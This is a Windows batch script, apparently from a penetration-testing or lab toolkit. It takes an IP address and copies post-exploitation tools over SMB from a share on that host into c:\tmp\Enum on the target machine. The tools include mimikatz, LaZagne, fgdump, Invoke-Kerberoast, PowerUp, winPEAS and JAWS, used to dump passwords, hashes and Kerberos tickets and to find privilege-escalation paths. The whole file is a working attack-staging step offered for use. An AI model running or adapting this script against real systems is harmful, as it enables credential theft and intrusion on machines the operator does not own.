@echo off
set par1=%1
echo Running %0
echo IP address given is %par1%
echo This script will use SMB to download Enumeration tools
echo ..................................
mkdir c:\tmp
mkdir c:\tmp\Enum
echo Created Directory: c:\tmp\Enum
echo ..................................
echo Downloading: README.txt
copy \\%par1%\share\README.txt c:\tmp\Enum\
echo Done...
echo ..................................
echo Downloading: Invoke-Kerberoast.ps1
copy \\%par1%\share\Invoke-Kerberoast.ps1 c:\tmp\Enum\
echo Done...
echo ..................................
echo Downloading: jaws-enum.ps1
copy \\%par1%\share\jaws-enum.ps1 c:\tmp\Enum\
echo Done...
echo ..................................
echo Downloading: Lasagne_pw_dump.exe
copy \\%par1%\share\lazagne_pw_dump.exe c:\tmp\Enum\
echo Done...
echo ..................................
echo Downloading: mimikatz64.exe
copy \\%par1%\share\mimikatz64.exe c:\tmp\Enum\
echo Done...
echo ..................................
echo Downloading: Mimikatz32.exe
copy \\%par1%\share\mimikatz32.exe c:\tmp\Enum\
echo Done...
echo ..................................
echo Downloading: PowerUp.ps1
copy \\%par1%\share\PowerUp.ps1 c:\tmp\Enum\
echo Done...
echo ..................................
echo Downloading: winPEASx64.exe
copy \\%par1%\share\winPEASx64.exe c:\tmp\Enum\
echo Done...
echo ..................................
echo Downloading: winPEASx86.exe
copy \\%par1%\share\winPEASx86.exe c:\tmp\Enum\
echo Done...
echo ..................................
echo Downloading: wpc2.exe
copy \\%par1%\share\wpc2.exe c:\tmp\Enum\
echo Done...
echo ..................................
echo Downloading: fgdump.exe
copy \\%par1%\share\fgdump.exe c:\tmp\Enum\
echo ..................................
echo DOWNLOADS COMPLETE
echo ..................................
type c:\tmp\Enum\README.txt
